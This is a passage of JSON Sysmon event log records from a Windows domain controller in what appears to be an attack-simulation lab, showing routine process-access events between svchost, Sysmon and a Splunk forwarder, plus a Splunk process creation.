\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.959\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2039-5F25-0000-0010FB0C0600}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.959","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2039-5F25-0000-0010FB0C0600}","TargetProcessId":"4500","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.320\r\nProcessGuid: {41C8662E-203B-5F25-0000-0010E90E0600}\r\nProcessId: 4456\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 